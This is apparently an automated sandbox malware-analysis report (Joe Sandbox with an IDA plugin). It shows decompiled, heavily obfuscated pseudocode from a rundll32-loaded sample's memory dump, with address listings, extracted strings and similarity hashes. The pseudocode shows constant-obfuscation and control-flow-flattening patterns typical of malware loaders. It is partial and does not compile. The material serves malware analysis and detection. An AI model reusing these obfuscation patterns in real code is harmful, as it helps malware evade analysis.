				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x18209c3b;
				_v136 = _v136 ^ 0x18233a52;
				_v40 = 0x84d4;
				_v40 = _v40 + 0xffffad0f;
				_v40 = _v40 ^ 0x00001bb0;
				_v76 = 0x1e9d;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 << 0xe;
				_v76 = _v76 ^ 0x0001d6d4;
				_v24 = 0x74d4;
				_v24 = _v24 + 0x300e;
				_v24 = _v24 ^ 0x0000e4a9;
				_v152 = 0x574f;
				_v152 = _v152 + 0xffff0717;
				_v152 = _v152 + 0xfc1b;
				_t462 = 0x22;
				_v152 = _v152 / _t462;
				_v152 = _v152 ^ 0x000048f1;
				_v56 = 0xa240;
				_v56 = _v56 * 0x13;
				_v56 = _v56 ^ 0x000c421c;
				_v48 = 0x46d8;
				_v48 = _v48 + 0xffff9ed1;
				_v48 = _v48 ^ 0xffff819b;
				_v176 = 0x4c6a;
				_v176 = _v176 << 3;
				_v176 = _v176 * 0x66;
				_v176 = _v176 ^ 0xb95308ef;
				_v176 = _v176 ^ 0xb9a0d115;
				_v92 = 0x7c71;
				_v92 = _v92 + 0xffffd392;
				_v92 = _v92 ^ 0xd6c6ceb0;
				_v92 = _v92 ^ 0xd6c6ee30;
				_v28 = 0x8801;
				_v28 = _v28 | 0x677935f6;
				_v28 = _v28 ^ 0x6779b40f;
				_v36 = 0x3fef;
				_v36 = _v36 >> 4;
				_v36 = _v36 ^ 0x000048b4;
				_v156 = 0x355d;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 0xa;
				_v156 = _v156 << 2;
				_v156 = _v156 ^ 0x006ad683;
				_v164 = 0x69f5;
				_v164 = _v164 | 0x7327f048;
				_v164 = _v164 + 0x492e;
				_v164 = _v164 >> 5;
				_v164 = _v164 ^ 0x03997b1a;
				_v132 = 0xe9f0;
				_v132 = _v132 >> 1;
				_v132 = _v132 | 0xa861283e;
				_v132 = _v132 + 0xffff8578;
				_v132 = _v132 ^ 0xa8613649;
				_v140 = 0xd113;
				_v140 = _v140 * 0x71;
				_v140 = _v140 + 0xca3d;
				_v140 = _v140 + 0x73b;
				_v140 = _v140 ^ 0x005d033b;
				_v148 = 0x96c;
				_v148 = _v148 >> 1;
				_v148 = _v148 >> 1;
				_v148 = _v148 * 0x49;
				_v148 = _v148 ^ 0x0000e65c;
				_v72 = 0x842c;
				_v72 = _v72 + 0xffff4ec4;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x07ffb926;
				_v80 = 0xf8c2;
				_t463 = 0xc;
				_v80 = _v80 / _t463;
				_t464 = 0x30;
				_v80 = _v80 * 0x1f;
				_v80 = _v80 ^ 0x0002fba7;
				_v44 = 0x2938;
				_v44 = _v44 | 0x7e3abb4d;
				_v44 = _v44 ^ 0x7e3afbfc;
				_v88 = 0xc2f1;
				_v88 = _v88 / _t464;
				_v88 = _v88 << 0xd;
				_v88 = _v88 ^ 0x00818cb8;
				_v180 = 0x3916;
				_v180 = _v180 + 0x25a3;
				_v180 = _v180 << 0xf;
				_v180 = _v180 + 0xffff7393;
				_v180 = _v180 ^ 0x2f5b8a5b;
				_v112 = 0x3c0f;
				_t465 = 0x2f;
				_v112 = _v112 / _t465;
				_t466 = 0x51;
				_v112 = _v112 * 0x69;
				_v112 = _v112 * 0x68;
				_v112 = _v112 ^ 0x003604d2;
				_v68 = 0x35d7;
				_v68 = _v68 + 0xffff8754;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0xfbd2be10;
				_v116 = 0xa3bd;
				_v116 = _v116 | 0x7a0af30a;
				_v116 = _v116 / _t466;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x181b29eb;
				_v64 = 0xc927;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0xa8f4;
				_v64 = _v64 ^ 0x0000b082;
				_v172 = 0xa13;
				_t467 = 0x70;
				_v172 = _v172 / _t467;
				_t468 = 0x5c;
				_v172 = _v172 * 0x23;
				_v172 = _v172 + 0xe62c;
				_v172 = _v172 ^ 0x0000e950;
				_v52 = 0xa44a;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 ^ 0x00000003;
				_v144 = 0x48ac;
				_v144 = _v144 + 0x6c20;
				_t333 =  &_v144; // 0x6c20
				_v144 =  *_t333 / _t468;
				_t339 =  &_v144; // 0x6c20
				_v144 =  *_t339 * 0x6c;
				_v144 = _v144 ^ 0x0000d435;
				_t508 = _v12;
				while(1) {
					L1:
					_t469 = _v124;
					while(1) {
						_t432 = _v108;
						while(1) {
							L3:
							_t520 = _t511 - 0x23eee725;
							if(_t520 <= 0) {
							}
							L4:
							if(_t520 == 0) {
								_push(_t469);
								_push(_t469);
								_t432 = E001B922B("RESCDIR");
								_t457 = _t432;
								_t518 =  &(_t518[3]);
								if(_t457 != 0) {
									_t511 = 0x1812e6e7;
									goto L12;
								}
							} else {
								_t432 = 0x10b4779f;
								if(_t511 == 0x10b4779f) {
									_push(_t469);
									_t442 = E001B8AE9(_t469, _t457, _v84, _t469, _a12, _v120, _t469,  &_v12, _v160, _v32, _t469, _v16, _t469, _v136, _v40, _v76, _v24,  &_v8);
									_t518 =  &(_t518[0x11]);
									if(_t442 == 0) {
										L24:
										_t511 = 0x1b1bcd72;
										goto L12;
									} else {
										_t445 = E001B0614();
										_t511 = 0x1db80426;
										_t432 = _v12 * 0x2c + _t457;
										_v108 = _t432;
										_t508 =  >=  ? _t457 : (_t445 & 0x0000001f) * 0x2c + _t457;
									}
									goto L13;
								} else {
									if(_t511 == 0x1812e6e7) {
										_push(_t469);
										_push(_t469);
										_t516 = E001B922B(0x2000);
										_t518 =  &(_t518[3]);
										_t511 =  !=  ? 0x10b4779f : 0x197e9f99;
										goto L12;
									} else {
										if(_t511 == 0x197e9f99) {
											return E001AE380(_v116, _t457, _v64);
										}
										if(_t511 == 0x1b1bcd72) {
											E001AE380(_v112, _t516, _v68);
											_t511 = 0x197e9f99;
											L12:
											_t432 = _v108;
											L13:
											_t469 = _v124;
											_t500 = 0x27ca871e;
											continue;
										} else {
											if(_t511 != 0x1db80426) {
												L28:
												if(_t511 != 0x6a1915b) {
													goto L1;
												}
											} else {
												_t469 = E001AD572(_v48, _v176, _a12, _v144,  *_t508, _v92);
												_t518 =  &(_t518[4]);
												_v124 = _t469;
												_t500 = 0x27ca871e;
												_t511 =  !=  ? 0x27ca871e : 0x25b495e5;
												_t432 = _v108;
												while(1) {
													L3:
													_t520 = _t511 - 0x23eee725;
													if(_t520 <= 0) {
													}
													goto L19;
												}
												goto L4;
											}
										}
									}
								}
							}
							L31:
							return _t432;
							L19:
							if(_t511 == 0x24c7bb9b) {
								_t511 = 0x23eee725;
								goto L28;
							} else {
								if(_t511 == 0x25b495e5) {
									_t508 = _t508 + 0x2c;
									asm("sbb esi, esi");
									_t511 = (_t511 & 0x029c36b4) + 0x1b1bcd72;
									continue;
								} else {
									if(_t511 == _t500) {
										E001A86D8( &_v4, _v28, _t516, _v36, _v156, _t469, _v164, _t469, _v172);
										_t511 =  !=  ? 0x28c00c53 : 0x25b495e5;
										_t432 = E001A24A4(_v124, _v132, _v140, _v148, _v72);
										_t518 =  &(_t518[0xa]);
										_t500 = 0x27ca871e;
										goto L28;
									} else {
										_t432 = 0x28c00c53;
										if(_t511 != 0x28c00c53) {
											goto L28;
										} else {
											E001B8C99(_v80, _a4, _v44, _v88, _v180, _t516, _v52);
											_t518 =  &(_t518[5]);
											goto L24;
										}
									}
								}
							}
							goto L31;
						}
					}
				}
			}

0x001b9bee
0x001b9bf5
0x001b9bfc
0x001b9c03
0x001b9c04
0x001b9c05
0x001b9c0a
0x001b9c12
0x001b9c15
0x001b9c24
0x001b9c26
0x001b9c2b
0x001b9c2f
0x001b9c32
0x001b9c36
0x001b9c3e
0x001b9c46
0x001b9c4e
0x001b9c53
0x001b9c5b
0x001b9c63
0x001b9c6b
0x001b9c7b
0x001b9c7f
0x001b9c87
0x001b9c8f
0x001b9c97
0x001b9c9f
0x001b9ca4
0x001b9cac
0x001b9cb8
0x001b9cbd
0x001b9cc7
0x001b9cca
0x001b9cce
0x001b9cd6
0x001b9cde
0x001b9ce6
0x001b9cee
0x001b9cf6
0x001b9cfe
0x001b9d11
0x001b9d18
0x001b9d23
0x001b9d2e
0x001b9d36
0x001b9d41
0x001b9d49
0x001b9d51
0x001b9d56
0x001b9d5e
0x001b9d66
0x001b9d6b
0x001b9d70
0x001b9d75
0x001b9d7d
0x001b9d85
0x001b9d89
0x001b9d91
0x001b9d96
0x001b9d9e
0x001b9da9
0x001b9db0
0x001b9dbb
0x001b9dc8
0x001b9dd0
0x001b9ddb
0x001b9de3
0x001b9deb
0x001b9df0
0x001b9df8
0x001b9e00
0x001b9e0b
0x001b9e16
0x001b9e21
0x001b9e29
0x001b9e2e
0x001b9e33
0x001b9e3b
0x001b9e46
0x001b9e51
0x001b9e5c
0x001b9e64
0x001b9e6c
0x001b9e7a
0x001b9e7d
0x001b9e81
0x001b9e89
0x001b9e9c
0x001b9ea3
0x001b9eae
0x001b9eb9
0x001b9ec4
0x001b9ecf
0x001b9ed7
0x001b9ee1
0x001b9ee5
0x001b9eed
0x001b9ef5
0x001b9efd
0x001b9f05
0x001b9f0d
0x001b9f15
0x001b9f20
0x001b9f2b
0x001b9f36
0x001b9f41
0x001b9f49
0x001b9f54
0x001b9f5c
0x001b9f61
0x001b9f66
0x001b9f6b
0x001b9f73
0x001b9f7b
0x001b9f83
0x001b9f8b
0x001b9f90
0x001b9f98
0x001b9fa0
0x001b9fa4
0x001b9fac
0x001b9fb4
0x001b9fbc
0x001b9fc9
0x001b9fcd
0x001b9fd5
0x001b9fdd
0x001b9fe5
0x001b9fed
0x001b9ff1
0x001b9ffa
0x001b9ffe
0x001ba006
0x001ba011
0x001ba01c
0x001ba024
0x001ba031
0x001ba03f
0x001ba044
0x001ba04f
0x001ba052
0x001ba056
0x001ba05e
0x001ba069
0x001ba074
0x001ba07f
0x001ba08f
0x001ba093
0x001ba098
0x001ba0a0
0x001ba0a8
0x001ba0b0
0x001ba0b5
0x001ba0bd
0x001ba0c5
0x001ba0d1
0x001ba0d6
0x001ba0e1
0x001ba0e4
0x001ba0ed
0x001ba0f1
0x001ba0f9
0x001ba104
0x001ba10f
0x001ba117
0x001ba122
0x001ba12a
0x001ba13a
0x001ba13e
0x001ba143
0x001ba14b
0x001ba156
0x001ba15e
0x001ba169
0x001ba174
0x001ba180
0x001ba185
0x001ba190
0x001ba191
0x001ba195
0x001ba19d
0x001ba1a5
0x001ba1b0
0x001ba1b8
0x001ba1c0
0x001ba1c8
0x001ba1d0
0x001ba1d6
0x001ba1da
0x001ba1df
0x001ba1e8
0x001ba1f0
0x001ba1f7
0x001ba1f7
0x001ba1f7
0x001ba1fb
0x001ba1fb
0x001ba1ff
0x001ba1ff
0x001ba1ff
0x001ba205
0x001ba205
0x001ba20b
0x001ba20b
0x001ba396
0x001ba397
0x001ba39d
0x001ba3a2
0x001ba3a4
0x001ba3a9
0x001ba3af
0x00000000
0x001ba3af
0x001ba211
0x001ba211
0x001ba218
0x001ba2ea
0x001ba341
0x001ba346
0x001ba34b
0x001ba40f
0x001ba40f
0x00000000
0x001ba351
0x001ba35c
0x001ba364
0x001ba376
0x001ba37a
0x001ba37e
0x001ba37e
0x00000000
0x001ba21e
0x001ba224
0x001ba2c8
0x001ba2c9
0x001ba2d4
0x001ba2d6
0x001ba2e5
0x00000000
0x001ba22a
0x001ba230
0x00000000
0x001ba4b3
0x001ba23c
0x001ba295
0x001ba29b
0x001ba2a0
0x001ba2a0
0x001ba2a4
0x001ba2a4
0x001ba2a8
0x00000000
0x001ba23e
0x001ba244
0x001ba494
0x001ba49a
0x00000000
0x001ba49c
0x001ba24a
0x001ba26b
0x001ba26d
0x001ba272
0x001ba27b
0x001ba280
0x001ba1fb
0x001ba1ff
0x001ba1ff
0x001ba1ff
0x001ba205
0x001ba205
0x00000000
0x001ba205
0x00000000
0x001ba1ff
0x001ba244
0x001ba23c
0x001ba224
0x001ba218
0x001ba4be
0x001ba4be
0x001ba3b9
0x001ba3bf
0x001ba48f
0x00000000
0x001ba3c5
0x001ba3cb
0x001ba477
0x001ba47c
0x001ba484
0x00000000
0x001ba3d1
0x001ba3d3
0x001ba43d
0x001ba465
0x001ba468
0x001ba46d
0x001ba470
0x00000000
0x001ba3d5
0x001ba3d5
0x001ba3dc
0x00000000
0x001ba3e2
0x001ba407
0x001ba40c
0x00000000
0x001ba40c
0x001ba3dc
0x001ba3d3
0x001ba3cb
0x00000000
0x001ba3bf
0x001ba1ff
0x001ba1fb

Strings

-, xrefs: 001B9CD6
h=, xrefs: 001B9CCE
?, xrefs: 001B9F36
]5, xrefs: 001B9F54
P, xrefs: 001BA19D
%#, xrefs: 001BA1FF
l\, xrefs: 001BA1D0
=F, xrefs: 001B9C8F
\, xrefs: 001B9FFE
%#, xrefs: 001BA48F
_L, xrefs: 001B9C3E
jL, xrefs: 001B9ECF
q|, xrefs: 001B9EF5
8), xrefs: 001BA05E
RESCDIR, xrefs: 001BA398
AM, xrefs: 001B9D36
|(, xrefs: 001B9D9E
*I, xrefs: 001B9D96
OW, xrefs: 001B9E5C
.I, xrefs: 001B9F83

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: l\$%#$%#$*I$-$.I$8)$=F$AM$OW$P$RESCDIR$\$]5$_L$h=$jL$q|$|($?
API String ID: 0-1474407461
Opcode ID: 8030ac475a99f1c2e0a636b3ce5a1b5927aeab5759eccab4c6843eb6e8a479ef
Instruction ID: bf7c50eb0b284f059818d8628e8987dfc44b4f52cc5f9d32367f9c4cb0a69904
Opcode Fuzzy Hash: 8030ac475a99f1c2e0a636b3ce5a1b5927aeab5759eccab4c6843eb6e8a479ef
Instruction Fuzzy Hash: EB2212725083809FE368CF65C48AA4BFBE1BBD4748F50891DE6D9962A0D7B58948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B5CCB, Relevance: 23.0, Strings: 18, Instructions: 453
COMMONCrypto

Download Yara Rule

C-Code - Quality: 44%

			E001B5CCB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				void* _t432;
				signed int _t459;
				intOrPtr _t467;
				signed int _t473;
				signed int _t475;
				intOrPtr _t482;
				signed char _t487;
				intOrPtr _t493;
				signed char _t495;
				signed int _t500;
				signed int _t506;
				intOrPtr _t507;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				void* _t546;
				void* _t548;
				signed int* _t563;
				void* _t565;

				_t507 = _a4;
				_push(_a8);
				_push(_t507);
				_push(__edx);
				_push(__ecx);
				E001AD571(_t432);
				_v16 = 0x79cd75;
				_t563 =  &(( &_v212)[4]);
				asm("stosd");
				_t548 = 0x360116c5;
				asm("stosd");
				_t509 = 0x71;
				asm("stosd");
				_v100 = 0x2227;
				_t546 = 0;
				_v100 = _v100 | 0x3cd009d5;
				_v100 = _v100 + 0xffffa411;
				_v100 = _v100 ^ 0x3ccfb606;
				_v108 = 0x2463;
				_v108 = _v108 / _t509;
				_t510 = 0x39;
				_v108 = _v108 * 0x4c;
				_v108 = _v108 ^ 0x0000985c;
				_v188 = 0x6f70;
				_v188 = _v188 + 0xffff2312;
				_v188 = _v188 | 0x2a7d245c;
				_v188 = _v188 << 7;
				_v188 = _v188 ^ 0xffdbef00;
				_v204 = 0x75b4;
				_v204 = _v204 / _t510;
				_v204 = _v204 + 0x3411;
				_v204 = _v204 + 0xffffe4f1;
				_v204 = _v204 ^ 0x00001b13;
				_v176 = 0xf2cc;
				_v176 = _v176 ^ 0x0c8b3ad5;
				_t511 = 0x41;
				_v176 = _v176 * 0x68;
				_v176 = _v176 << 0xb;
				_v176 = _v176 ^ 0x4a514040;
				_v64 = 0x144e;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0xf000a270;
				_v52 = 0x1063;
				_v52 = _v52 | 0x5daca785;
				_v52 = _v52 ^ 0x5dac8fc7;
				_v200 = 0x5825;
				_v200 = _v200 * 0x49;
				_v200 = _v200 / _t511;
				_v200 = _v200 ^ 0x647fb738;
				_v200 = _v200 ^ 0x647ffcd8;
				_v208 = 0x7c7f;
				_v208 = _v208 >> 9;
				_v208 = _v208 ^ 0x0ba3915a;
				_v208 = _v208 + 0xffff9910;
				_v208 = _v208 ^ 0x0ba307aa;
				_v128 = 0x48fb;
				_v128 = _v128 + 0xffffea65;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x00003a72;
				_v152 = 0x7e92;
				_v152 = _v152 | 0xdddfeef3;
				_v152 = _v152 >> 0xb;
				_v152 = _v152 ^ 0x001bef09;
				_v88 = 0xfbe;
				_v88 = _v88 ^ 0x24589b22;
				_v88 = _v88 << 5;
				_v88 = _v88 ^ 0x8b12b1de;
				_v48 = 0x1715;
				_v48 = _v48 + 0xffff7b06;
				_v48 = _v48 ^ 0xffff8c51;
				_v168 = 0xc939;
				_v168 = _v168 | 0xb425a04d;
				_v168 = _v168 + 0xffff5eb6;
				_t512 = 0x3a;
				_v168 = _v168 / _t512;
				_v168 = _v168 ^ 0x031b5098;
				_v104 = 0xa8da;
				_v104 = _v104 >> 3;
				_v104 = _v104 + 0xae7c;
				_v104 = _v104 ^ 0x0000b827;
				_v56 = 0x6eab;
				_v56 = _v56 << 5;
				_v56 = _v56 ^ 0x000dd63d;
				_v96 = 0x6d10;
				_v96 = _v96 << 2;
				_v96 = _v96 + 0xffffe478;
				_v96 = _v96 ^ 0x0001f912;
				_v160 = 0x9bd9;
				_v160 = _v160 ^ 0x52db1b0f;
				_v160 = _v160 ^ 0xc9aff98f;
				_v160 = _v160 << 8;
				_v160 = _v160 ^ 0x747945a8;
				_v40 = 0xc6b7;
				_v40 = _v40 | 0x500b25f0;
				_v40 = _v40 ^ 0x500b88bb;
				_v212 = 0x6b3c;
				_v212 = _v212 | 0xe1842ac5;
				_t513 = 9;
				_v212 = _v212 / _t513;
				_v212 = _v212 + 0xdac0;
				_v212 = _v212 ^ 0x190fe0cc;
				_v156 = 0x2b4e;
				_v156 = _v156 | 0xa342ae93;
				_t514 = 5;
				_v156 = _v156 / _t514;
				_v156 = _v156 ^ 0x765355c0;
				_v156 = _v156 ^ 0x56f5be8f;
				_v136 = 0xff44;
				_v136 = _v136 | 0xdb29a193;
				_t515 = 0x1f;
				_v136 = _v136 * 0x56;
				_v136 = _v136 ^ 0xa01be086;
				_v148 = 0xee3f;
				_v148 = _v148 + 0x501a;
				_v148 = _v148 << 5;
				_v148 = _v148 ^ 0x0027c222;
				_v124 = 0xf285;
				_v124 = _v124 << 0x10;
				_v124 = _v124 | 0x8bf3a027;
				_v124 = _v124 ^ 0xfbf79f04;
				_v184 = 0x89f9;
				_v184 = _v184 ^ 0x007f2033;
				_v184 = _v184 >> 0x10;
				_v184 = _v184 / _t515;
				_v184 = _v184 ^ 0x00002e50;
				_v80 = 0x8c1d;
				_v80 = _v80 | 0xaf410438;
				_v80 = _v80 ^ 0xaf41f117;
				_v192 = 0x7abf;
				_v192 = _v192 >> 0xd;
				_t516 = 0x42;
				_v192 = _v192 / _t516;
				_v192 = _v192 << 0x10;
				_v192 = _v192 ^ 0x00005501;
				_v28 = 0xc71b;
				_v28 = _v28 + 0xbb71;
				_v28 = _v28 ^ 0x0001e5fc;
				_v120 = 0xa6c1;
				_t517 = 0x2a;
				_v120 = _v120 * 0x61;
				_v120 = _v120 + 0x1560;
				_v120 = _v120 ^ 0x003f3b27;
				_v72 = 0xd93;
				_v72 = _v72 << 1;
				_v72 = _v72 ^ 0x00004125;
				_v112 = 0xa280;
				_v112 = _v112 << 0xb;
				_v112 = _v112 + 0x533;
				_v112 = _v112 ^ 0x051418ac;
				_v180 = 0x1180;
				_v180 = _v180 << 1;
				_v180 = _v180 << 3;
				_v180 = _v180 + 0xa356;
				_v180 = _v180 ^ 0x0001b606;
				_v144 = 0xdc1b;
				_v144 = _v144 * 0x2b;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 ^ 0x00004a7a;
				_v84 = 0xc459;
				_v84 = _v84 / _t517;
				_v84 = _v84 ^ 0x00005cf8;
				_v164 = 0xe226;
				_v164 = _v164 + 0xffff9be5;
				_t459 = _v164;
				_t518 = 0x68;
				_t543 = _t459 % _t518;
				_v164 = _t459 / _t518;
				_v164 = _v164 + 0xe0b;
				_v164 = _v164 ^ 0x00002615;
				_v140 = 0x19eb;
				_v140 = _v140 << 0xa;
				_v140 = _v140 ^ 0x236f8deb;
				_v140 = _v140 ^ 0x23082bc1;
				_v76 = 0xcdb3;
				_v76 = _v76 + 0xa380;
				_v76 = _v76 ^ 0x00016ecf;
				_v60 = 0xd52d;
				_v60 = _v60 << 6;
				_v60 = _v60 ^ 0x003563e5;
				_v32 = 0xe8c5;
				_v32 = _v32 + 0xffff36e5;
				_v32 = _v32 ^ 0x0000021d;
				_v68 = 0x8805;
				_v68 = _v68 ^ 0x5705875c;
				_v68 = _v68 ^ 0x57056974;
				_v44 = 0x98f4;
				_v44 = _v44 >> 0xb;
				_v44 = _v44 ^ 0x00004bcc;
				_v132 = 0x7d06;
				_v132 = _v132 + 0xdbf8;
				_v132 = _v132 << 0x10;
				_v132 = _v132 ^ 0x58fe476c;
				_v172 = 0x3e2f;
				_v172 = _v172 << 2;
				_v172 = _v172 | 0xb4cc5e5f;
				_v172 = _v172 ^ 0xe6f3cec2;
				_v172 = _v172 ^ 0x523f30f0;
				_v196 = 0xda5f;
				_v196 = _v196 * 0x3d;
				_v196 = _v196 | 0xad149301;
				_v196 = _v196 + 0xe581;
				_v196 = _v196 ^ 0xad359d57;
				_v116 = 0x736a;
				_v116 = _v116 * 0x46;
				_v116 = _v116 + 0xffff86d6;
				_v116 = _v116 ^ 0x001e15d2;
				_v92 = 0x105b;
				_v92 = _v92 ^ 0xde8a2ffb;
				_v92 = _v92 * 0x72;
				_v92 = _v92 ^ 0x19905553;
				_v36 = 0x9dc4;
				_v36 = _v36 + 0xffff12ea;
				_v36 = _v36 ^ 0xffffb0af;
				goto L1;
				do {
					while(1) {
						L1:
						_t565 = _t548 - 0x287d7a71;
						if(_t565 > 0) {
							break;
						}
						if(_t565 == 0) {
							_push(_v124);
							_push(_v92);
							_push(_v36 | _v116);
							_push(_v148);
							_push(_t518);
							_push( &_v24);
							_push(_v188);
							_t487 =  &_v20 & 0x000000ec;
							 *_t487 =  *_t487 + _t487;
							_t507 = _t507 + _t507;
							_t546 = 0;
							if(0 == 0) {
								L18:
								asm("invalid");
								continue;
							} else {
								if(0 < 0) {
									goto L11;
								} else {
									_push(_t563);
									_push( *((intOrPtr*)(_t507 + 4)));
									_t518 = _v208;
									_push(_t487 & 0x0000006c);
									_t506 = E001B9A9B(_t518, _t543);
									_t563 =  &(_t563[0xb]);
									asm("sbb esi, esi");
									_t548 = ( ~_t506 & 0x06f5c840) + 0x2d44d745;
									goto L18;
								}
							}
						} else {
							if(_t548 == 0xc79a0e7) {
								_t393 =  *0x1001f9d0 + 4; // 0x5a
								E001A1A96( *_t393);
								_pop(_t518);
								_t548 = 0x26333af5;
								continue;
							} else {
								if(_t548 == 0xf2080a0) {
									E001AE380(_v152,  *0x1001f9d0, _v88);
								} else {
									if(_t548 == 0x124f174f) {
										_t493 =  *0x1001f9d0;
										_push(_t518);
										_t384 = _t493 + 0x18; // 0x1001fee0
										_push( *_t384);
										_push(_v132);
										_push(_v44);
										_t487 =  *0x1001f9d0 + 8;
										_push(_t487);
										_push(_v68);
										_push(_v108);
										_push(_v32);
										_t543 = _v60;
										L11:
										_t495 = _t487 & 0x000000c8;
										 *_t495 =  *_t495 + _t495;
										asm("invalid");
										asm("invalid");
										_t563 =  &(_t563[8]);
										if(_t495 + _t518 != 0) {
											_t546 = 1;
										} else {
											_t548 = 0xc79a0e7;
											continue;
										}
									} else {
										if(_t548 == 0x177348ac) {
											_t380 =  *0x1001f9d0 + 0x18; // 0x1001fee0
											_t543 = _v84;
											_t518 = _v100;
											_t500 = E001AD079(_t518, _v84, _v164,  *_t380, _v204, _v140,  *0x1001f9d0 + 4, _v76);
											_t563 =  &(_t563[6]);
											asm("sbb esi, esi");
											_t548 = ( ~_t500 & 0xec1bdc5a) + 0x26333af5;
											continue;
										} else {
											if(_t548 != 0x26333af5) {
												goto L28;
											} else {
												_t376 =  *0x1001f9d0 + 0x30; // 0x10020bfc
												E001A1A96( *_t376);
												_pop(_t518);
												_t548 = 0x2d44d745;
												continue;
											}
										}
									}
								}
							}
						}
						L32:
						return _t546;
					}
					if(_t548 == 0x2d44d745) {
						_t467 =  *0x1001f9d0;
						_push(_t518);
						_t429 = _t467 + 0x18; // 0x1001fee0
						E001A2BC9(_t518,  *_t429);
						_t563 =  &(_t563[3]);
						_t548 = 0xf2080a0;
						goto L28;
					} else {
						if(_t548 == 0x3303c7f7) {
							_t543 = _v48;
							_t473 = E001B7643(_t518, _v48, _t518, _v168, _t518, _v104, _v56, _v64 | _v176,  *0x1001f9d0 + 0x18);
							_t563 =  &(_t563[7]);
							asm("sbb esi, esi");
							_t548 = ( ~_t473 & 0x195cf9d1) + 0xf2080a0;
							goto L1;
						} else {
							if(_t548 == 0x343a9f85) {
								_t519 =  *0x1001f9d0;
								_t412 = _t519 + 0x30; // 0x1001fa00
								_t414 = _t519 + 0x18; // 0x1001fee0
								_t475 = E001A5BAC(_v20,  *0x1001f9d0, _v184,  *_t414, _v24, _t412, _v80, _v192, _v28, _v120);
								_t543 = _v72;
								_t518 = _v24;
								asm("sbb esi, esi");
								_t548 = ( ~_t475 & 0xea2e7167) + 0x2d44d745;
								E001A1631(_t518, _v72, _v112);
								_t563 =  &(_t563[0xa]);
								goto L28;
							} else {
								if(_t548 != 0x360116c5) {
									goto L28;
								} else {
									_push(_t518);
									_push(_t518);
									_t482 = E001B922B(0x34);
									_t563 =  &(_t563[3]);
									 *0x1001f9d0 = _t482;
									if(_t482 != 0) {
										_t548 = 0x3303c7f7;
										goto L1;
									}
								}
							}
						}
					}
					goto L32;
					L28:
				} while (_t548 != 0x23bcc5dc);
				goto L32;
			}

0x001b5cd2
0x001b5cdc
0x001b5ce3
0x001b5ce4
0x001b5ce5
0x001b5ce6
0x001b5ceb
0x001b5cff
0x001b5d02
0x001b5d05
0x001b5d0c
0x001b5d0d
0x001b5d10
0x001b5d11
0x001b5d1c
0x001b5d1e
0x001b5d29
0x001b5d34
0x001b5d3f
0x001b5d4f
0x001b5d58
0x001b5d5b
0x001b5d5f
0x001b5d67
0x001b5d6f
0x001b5d77
0x001b5d7f
0x001b5d84
0x001b5d8c
0x001b5d9c
0x001b5da0
0x001b5da8
0x001b5db0
0x001b5db8
0x001b5dc0
0x001b5dcd
0x001b5dce
0x001b5dd2
0x001b5dd7
0x001b5ddf
0x001b5dea
0x001b5df2
0x001b5dfd
0x001b5e08
0x001b5e13
0x001b5e1e
0x001b5e2b
0x001b5e35
0x001b5e39
0x001b5e41
0x001b5e49
0x001b5e51
0x001b5e56
0x001b5e5e
0x001b5e66
0x001b5e6e
0x001b5e76
0x001b5e7e
0x001b5e83
0x001b5e8b
0x001b5e93
0x001b5e9d
0x001b5ea2
0x001b5eaa
0x001b5eb5
0x001b5ec0
0x001b5ec8
0x001b5ed3
0x001b5ede
0x001b5ee9
0x001b5ef4
0x001b5efc
0x001b5f04
0x001b5f12
0x001b5f17
0x001b5f1d
0x001b5f25
0x001b5f30
0x001b5f38
0x001b5f43
0x001b5f4e
0x001b5f59
0x001b5f61
0x001b5f6c
0x001b5f77
0x001b5f7f
0x001b5f8a
0x001b5f95
0x001b5f9d
0x001b5fa5
0x001b5fad
0x001b5fb2
0x001b5fba
0x001b5fc5
0x001b5fd0
0x001b5fdb
0x001b5fe3
0x001b5fef
0x001b5ff4
0x001b5ffa
0x001b6002
0x001b600a
0x001b6012
0x001b601e
0x001b6023
0x001b6029
0x001b6031
0x001b6039
0x001b6041
0x001b604e
0x001b604f
0x001b6053
0x001b605b
0x001b6063
0x001b606b
0x001b6070
0x001b6078
0x001b6080
0x001b6085
0x001b608d
0x001b6095
0x001b609d
0x001b60a5
0x001b60b0
0x001b60b4
0x001b60be
0x001b60c9
0x001b60d4
0x001b60df
0x001b60e7
0x001b60f2
0x001b60f7
0x001b60fd
0x001b6102
0x001b610a
0x001b6115
0x001b6120
0x001b612b
0x001b6138
0x001b613b
0x001b613f
